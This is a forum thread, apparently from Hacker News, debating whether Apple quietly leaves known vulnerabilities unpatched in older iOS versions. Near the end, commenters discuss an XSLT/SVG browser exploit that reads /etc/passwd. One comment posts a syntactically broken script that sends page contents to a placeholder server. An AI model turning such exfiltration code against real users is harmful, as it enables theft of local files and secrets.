In fact, one could argue it's also "very unethical" for Apple to (negligently) allow someone to use a potentially unsafe or hackable product. To be maximally ethical, Apple should be remotely bricking any Apple device the day it loses security support. Better to be on the safe ("ethical") side and remote wipe too, to protect people's data privacy.

Can you see how Argument From I Merely Assert XYZ Is Unethical Then Demand Some Arbitrary Relief can quickly break down?


iOS 12 was released September 2018 and

> iOS 12.5.7

> Released January 23, 2023

https://support.apple.com/en-us/103015


So theoretically - and I tried this a couple of years ago - I could still download the “last compatible version” of an app if it’s available on the store for my old 2010 iPad 1st generation running iOS 5.

This device had 256Mb RAM and 400Mhz 32 bit processor. Should Apple still support this with security updates?


It’s an issue of expectations. If Apple advertises security support then it’s fraudulent to not deliver it; on the other hand, if they advertise an EOL date, then I’d agree there’s no reasonable expectation of security updates. But what they actually do is neither, they communicate very little, supporting some past iOS versions fully and others to degrees that only they know, resulting in them profiting off a reputation for backporting security updates while not actually binding themselves to deliver it, or, often, doing so.

Like the battery issue, I feel the whole issue is communication. Apple needs to communicate when they EOL OS versions. You don’t otherwise know it, partly because EOL OS’s, including this phone’s, still get security updates, just not all of them.


They do communicate it in every major release, including which devices are supported. Many major vendors release security updates for EOL devices when doing so would greatly increase the security posture of those devices and comes at little to no cost to the vendor. Notably Cisco, Microsoft, Apple, and Samsung come to mind.

Is the implication that once a device is EOL that a vendor should never release an update for that device again?


They only communicate it after the fact, when the new OS is impending release. There’s no way to know at time of purchase how many years your device will be supported.

I feel like Apple changed the dynamics of smartphone market from company-issued devices like BlackBerry to BYO with the iPhone essentially on purpose so they don’t get stuck providing decades of enterprise support promises like companies like Microsoft.

Companies purchasing bulk orders of hardware probably wouldn’t tolerate a vendor unwilling to make any sort of concrete support promise for the contract. But a company who employs iPhone users can basically put the responsibility on the user and simply block access to non-compliant devices.


> Is the implication that once a device is EOL that a vendor should never release an update for that device again?

It seems typical for vendors use "EOL" to refer to end of support life, not merely discontinuing sales of the produce. Most notably, that's how Microsoft generally frames EOL for major Windows releases, hence expectation of jumps in PC sales corresponding to EOL of XP, 7, and 10.


They communicate OS version device compatibility, I’m talking about communicating OS version EOL. For example, Windows 10 EOL is 2025-10-14, and we know this years in advance. For Apple, not only do we not get advance notice, we don’t even know when it’s already happened.

No, I’m not implying there’s something wrong with shipping the occasional update to EOL devices.


Does apple release jailbreak tools for ten year old phones?


Correct. The issue is it is not commonly known that Apple isn't actually backporting fixes for exploits while it has been claiming to update the phones: this is earth-shaking[^1] news

[^1] It would be completely reasonable to say "Earth-shaking? Really? You expect security backports for a decade?" I've been in mobile my whole career, iOS for 7 years, starting from jailbreaking the original iPhone, then worked on Android itself for 7 years. I am sure significant decisions were made assuming this was the case.


Touche. P.S. Keep in mind though, what is the state of security of the Android phone you bought new in November 2015?


The Nexus 6 (2014) can still run a version of android with security patches: https://wiki.lineageos.org/devices/shamu/

Google no longer offers security patches directly, but since you control the phone sufficiently to install your own OS, the community can come together and keep security updates flowing. You could do it yourself if you wanted.

Apple devices make this sort of community maintainership effectively impossible.

I know this means practically nothing since only nerds can actually install a third-party ROM, so for the general populace only the "default" security patch window matters, but for the hacker news crowd it seems like it might be a meaningful difference.


But it is effectively impossible on Android as well. Let's ignore for a minute the fact that practically no one can install a custom ROM.

The bigger problem is that a huge bunch of software running on the phone is fully proprietary and closed source, and there are many many different versions for different phones around - making it virtually impossible to do any meaningful reverse engineering. So sure, your main OS may be up to date, but the baseband OS and virtually all of the device drivers will be left vulnerable, and they have just as much if not more access to the data on your device.


Is my grandma going to install a custom rom? If it’s not over the air it might as well not exist.


Maybe you could be a good grandson and do it for her?


I don’t consider it a good thing to install a custom OS for someone and not give them the same level of support.


Does that include updated drivers? If no, then there are still many unfixed security vulnerabilities.


It's all well and good to say "oh you can just install a custom ROM". But you (and many here) can do that. Because you're technically inclined. But the vast majority have users have no idea what the hell you're talking about. They barely know what a security update is or what version of Android they're using, let alone being able to find, choose, and install a ROM.

Can we just choose to stop suggesting it as a legitimate solution cause outside of this bubble, it absolutely is not.


people don't know how to install Windows either. In theory they could go to a shop to update their phone like their are doing with Windows but the reality is that nobody cares about updating their phone.


Is the only standard to which we hold one company whatever the other does? Is there no room for higher principles here, in your view? The competition between consumer brands is all that matters?

Come on.


Huh, it can be totally earth shaking or completely normal depending on time and place. In current market place of smartphones it is more towards earth shaking than normal.

You don't have to agree but resell value of older iPhone being much-much higher than Android tells customer values the support and quality of iPhone.


As much as the sales of healing crystals tells me how much people value the health and anti-aging benefits of those.


Healing crystals seems to be a much smaller market (to the point of barely existing) than “Big Pharma”, so your analogy doesn’t really make sense.


The irony of Steve Jobs himself dying because he wasted time trying non-big-pharma "remedies" before following actual oncologists advice is too much.


My 10 year old laptop is still getting OS updates


> My 10 year old laptop is still getting OS updates

Microsoft is trying to fix this. Win 11 wants a TPM. /s


Some iOS 15 phones like the 5S/SE have no newer comparable phones which makes upgrading difficult. Oh dear, I suppose not browsing the web is another option.


What’s missing from the more recent SE models?


A 4-inch screen size that allows the phone to be used single-handed with ease anywhere on the screen, which I’m using to write this comment right now. It’s uncompromising in battery longevity when considering its size, too. First-gen SE is the best phone Apple ever made. The newer SE are terrible.


As someone that went from 5S to 2016 SE to 2020 SE which is my current phone, I've been very satisfied with the 2020 SE.

With each phone I have always taken steps to reduce battery usage, disabled background refresh, and manually turn on low power mode after charging every single time.


Not sure if you're doing it manually from the settings, but you can create a Shortcut that enables low power mode. I have a little icon that I press, but there might be an even better way (automatically trigger on unplug? IDK)


Is your hand large enough to handle the phone one-handed and touch anywhere on the screen with ease without risking a drop? If not, do you use some kind of magnet finger-ring case or similar case?


I have my iPhones set to bring the top of the screen to the middle when I double tap on the Apple logo on the back.

It’s a feature called Reachability.

https://support.apple.com/guide/iphone/use-reachability-iph1...


I cannot reach the upper left corner one-handed. Have not tried finger-rings or popsockets yet.


Small physical size, also a headphone jack.

The more recent SE models are iPhone 8 bodies with upgraded internals (being an iPhone 11 and 13 inside, respectively) and Apple no longer offers a Mini version of their newer phones (not that the A16 and A17 are significant improvements on the A15, but still).

And the Mini is still larger than the first SE by about a half inch in either direction; the 8 (and the newer phones) add another half inch on top of that.

Of course, the problem with using a first-gen SE today is that because information density on mobile is abysmal, the added vertical space has been very welcome to app developers (who also might not test on the smallest screens). So while the smaller phones were ergonomically far superior to the larger ones, and this is to a point true for the Minis as well, that's since been "balanced" by inherently worse UI/UX on said phones.


Eh, iPhone SE 2nd generation/3rd generation?


It's worrying to me since it's often kids who get the hand-me-down phones. I don't think they are going to know how vulnerable their data is. Surely Apple could at least let a community compile latest security updates, if they don't wanna invest their many riches in it? People often can't afford newer phones, and their data is vulnerable.


How do we know they won’t patch it in like an iOS 15.8.1 update?

Even iOS 12 had a security update in 2023 still.


Apple doesn't patch every security hole in older iOS versions. I don't know what the criteria is, but my guess is if it's a major security hole, or an easily backported one, they'll do it, but if it's super minor or not backportable, they won't.


If I had to guess, I think it’s when they see a report that it’s been actively exploited.


Would be great to get Linux running on and driver coverage for all of the system-on-chip of these devices. Talent exists for this but they are busy with their jobs or more interesting problems.


https://projectsandcastle.org/

But don’t get too excited.


Moving the photos and videos to a hard rive is a pain usb is buggy, icloud is useless. Cheaper iphones have very little storage and there is no ssd slot either. It means, when the phone is full you have to buy a new one. If you want to update (assuming updates are available) you have to do hours of manual photo and video deletion to make space for the update.

If they really wanted to update phones that are full they could move the images/video to their server until the update is done.


I think a lot of people here are missing an important point here that Apple has always been fairly ambiguous about what their level of support is for older devices beyond major feature updates.

If it weren't for a friend giving me his old iPhone XS as thanks for a favor, I'd probably still be using my old iPhone 6s--and I would not have worried about it from a security perspective purely because (as the article notes) Apple is still releasing security fixes for iOS 15. I'd feel differently if Apple had publicly stated that all iOS 15 security fixes from now on will be on a minimum effort basis only.


Those Apple commercials purporting their ecosystem was the safest/secure have aged like old milk


Which 10 year old phone is more safe / secure?


> Which 10 year old phone is more safe / secure?

Windows Phone ? I bet nobody writes exploits for it anymore. /s


Not really, no.


I don't know what OP expects from such an old device. Apple goes above and beyond other manufacturers in terms of support.

The phone is almost 10 years old, the only thing Apple should do is send out a push notification warning users their device is no longer supported.


My laptop is older than that and I have no problem getting updates. Turns out tightly coupling hardware and software for general computing devices is not such a great idea for users or the environment.


Microsoft straight up disallows Windows 11 installation on plenty of PCs that could easily run it.

Sure you can argue that it's "easy" to install Linux on it, but that's out of scope for the typical user.


Apple straight-up disallows MacOS updates on plenty of Macs that could easily update, too. I'd even argue they're worse than Microsoft about it; I heard about Opencore Legacy Patcher looooong before I knew people were modifying Windows 11 images to get a working install.

> you can argue that it's "easy" to install Linux on it

In my experience, the average Linux install wizard is less technically involved than the MacOS one. So yeah, maybe I would argue that.


Most people don't even know how to install an OS.

I wouldn't expect the typical person to be able to do it.


Moot point. Both Microsoft and Apple expected the user to install their own OS in the past, and the world didn't explode because of it. If stuff like UEFI and bootloader unlocking was standard again, OS installation would be easy as plugging in a dongle and rebooting.

Plus, you still haven't touched the central point; tightly coupled software and hardware creates more e-waste. What people do today doesn't matter if they're never presented a serious alternative; if ignorance was a basis for removing functionality there would be nothing left of the modern smartphone.


Apple fans would say tightly coupled software and software is why Apple products are better than competitors. I don't fully agree but I can see the point.


They may be right. If that same system has proven harms though (or even simple conflicts-of-interest), Apple might have to find a new business model. The whole "we own your app store, we own your payment processor" shtick has really raised eyebrows in the international markets.


Quoting the post:

> iOS 15.8 is still powering those devices, seemingly with official Apple support, with the latest update from October the 25th, which addressed some security vulnerabilities.

> In reality, however, Apple seems to only be addressing some security issues in its older supported devices.

The author is surprised, reasonably IMO, that if a device is getting security updates, you are still exposed to known vulnerabilities.

For a tech competent user this is worse than clearly being out of support in which case you would retire the device.


Well that's just weird, you either support devices or not.


Microsoft still release security updates sometimes for 22 years old Windows XP.


>Apple declined to comment for this article.


This is true for pretty much every vendor. Security fixes do not all get backported to every previous version of something. Newer iPhone do not just run the latest version of iOS, but they are more secure from a hardware perspective too.


"every previous version"

No reasonable person is asking for this.


Okay replace that with "more than the latest version / LTS".


How is hardware relevant here?


fwiw I tested this and the exploit doesn't work on iOS 16 which is the latest available for a 2017 iPhone X.


The iPhone 8 was sold new less than 3 years ago. Okay, new features shouldn't be expected, but patching known vulnerabilities should be required.


What does the iPhone 8 have to do with this discussion?

The linked piece specifically refers to iPhone 6S and iOS 15.8.


It runs iOS 16, where Apple has the same policy of only providing partial fixes. From the article:

> A new exploit targeting the iOS (among other OS’) Bluetooth stack has also been left unpatched by Apple in all versions except iOS 17.


iPhone 8 had a patch to iOS 16 released a week ago, 6 years after it was released and 3 years after it was last sold during a global pandemic?


And the entire point of the article is that those security patches are ignoring known vulnerabilities that are patched by Apple in iOS 17.


The iPhone 6S mentioned was released in 2015, but should run iOS 15, which Apple still should be releasing security updates for?


Apple only publishes all iOS and macOS updates to the latest version of their operating systems. They release important updates to older operating systems (which is better than much of their competition!) but not all vulnerabilities are fixed for old versions.

You'll probably always be safe from remote code execution on supported versions of iOS/macOS, but exploits like these aren't always fixed. Unfortunately, you can't install an alternative browser engine on iOS/iPadOS, so I guess you should expect all websites to be able to read all of your cookies just in case.


As he clearly describes in the article, Apple seems to patch some exploits but not others in older versions of iOS.


I understand that, I’m just saying that they claim it gets security updates, so it seems like the kind of thing they should include.


When opening the page, your /etc/passwd is there for the world to see.

...more precisely, for you to see; this needs to be combined with something to send back data (JS?) to be truly exploited.


And how's that more difficult than the loading page (exploit.svg) doing a GET/POST request to some server, after <xmp><xsl:copy-of select="document('exploit.php')"/></xmp> was loaded?


Isn't the JS exfiltration part trivial?

The attack assumes that the victim is visiting an attacker-controlled web server.

If the attacker can put secret data in the DOM within the victim's browser, the attacker can also add JS on the same page that POSTs the DOM contents to the server once they're populated with secrets.


If it's "trivial", then perhaps the article should've demonstrated that.


Vulnerabilitity research without doing the work to productize exploits is good and productive, let's not normalize the opposite expectation. It's a chilling effect.


If I prove I got a shell prompt on a remote device without any authentication, do I then need to show that I can execute arbitrary code? Or is it clearly implied?

If the page body can read a file, then it can just execute an XmlHttpRequest to send that data to the origin server, which is the attacker in this scenario. This is just how the web works, nothing more to say about it, and no need to prove it.


It's not necessarily true that what can be read locally can be sent to a remote server.


It very much is on the web, if you are sending it to the origin server.


[flagged]


Yes, obviously the website can retrieve this data too.

  <script>
  var olis=document.getElemeByTagName(‘p’);
  Data=olis[1].text content;
  xmlHttp2 = new   XMLHttpRequest;
  xmlHttp2.open(‘GET’, ‘https://endpoint/?data=‘+data);
  xmlHttp2.send();
  </script)


Only took 7 hours to get something that looks like it might work but clearly has tons of syntax errors and won't work as-is.

What are y'all trying to hide?


Typed from my phone. I don't reply to hn comments based on your schedule.


You are too smart to die on this absurd hill, knock it off.


Yea, this reads like someone was denied a bounty for a "exploit" and decided to make it a whole thing as retribution.


I don't see how. Apple is choosing to not patch known vulnerabilities on hardware sold new less than 3 years ago. Hardware they're happy to charge for repairs on.


Yes, science as a public service as retribution


That is why I am an android dude, you will always find a random ROM on xda with the latest android security patch and sometimes even the latest android version on devices 10+ years old even if the manufacturer has stopped supporting it a while ago.


Not going to lie, if I were trying to infect some devices, it might be through “porting” unofficial “patches” (that no one will ever realistically inspect) for 10+ year old, out-of-support devices whose users have allowed root access.


XDA works a lot on reputation and realistically you will infect like 1k phones none of which will be high value targets. I don't see the motivation. Those maintainers do quite a lot of work to backport patches every week/month and offer OTA. Also I dont enable root when flashing, that is not required at all.


Wait... so because you don't want to be infected because you're using an out of date OS, you load OS patches of questionable provenance, but you're not worried about that since nobody would bother to infect you anyway? Why not skip a few steps there and just run an out of date OS?


Every device running an old OS is vulnerable, so it's better to throw the dice on an aftermarket ROM.

Edit: Though to keep things fair, it must be said that that particular argument only really applies to old devices. If you have a new device (or rather, one still getting regular security updates from the vendor) and a trustworthy vendor, a person could reasonably argue for staying on the stock ROM.


Fair point


think about it the other way: if someone who happens to use random ROM happens to be a target of a state security agency of course it would be trivial to infect and the other 999 users would be collateral damage.


If state security agency is your model threat you'll be hard pressed to stay secure even with an airgap. If it's wholesale worm-like attacks you'll be way ahead of the curve by using a niche ROM from a god-forsaken site compared to any slightly out-of-date OEM distro.


Realistically, if someone makes a fringe rom that may be downloaded a few thousand times, how many people are going to bother checking for nefarious exploits hidden in there?

I hate that I wrote that lol. It reeks of the kind of cybersecurity whataboutism that leads to people inconveniencing the SHIT out of themselves for the sake of security.


I think human laziness can be counted on. Realistically I dont see any benefit in doing something nefarious and there is karma like on HN.


> you will always find a random ROM on xda

Installing random ROMs from random developers is an interesting take on security.


That was bad phrasing, there is karma on XDA and trusted name reputation (evolution x, pixel experience, lineage os). So it is not a random ROM from a random dev. And you always have the source for those builds.


What about the binary blob drivers that can’t be patched and are one of the leading attack vectors? Just look at all of the Qualcomm monthly patches alone . Unless all of your binaries, that have no source, are up to date you’ll never be secure on any XDA rom.


That is a real problem agreed, though vendors are starting to OSS more of those lately. Still better than running an unpatched android of 4 years.


lol! Are you really comparing Apple released operating system updates to xda?


The whole point of the article is that they don't actually do that


How does a random image help most users?


I guess bricking your device makes security irrelevant




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: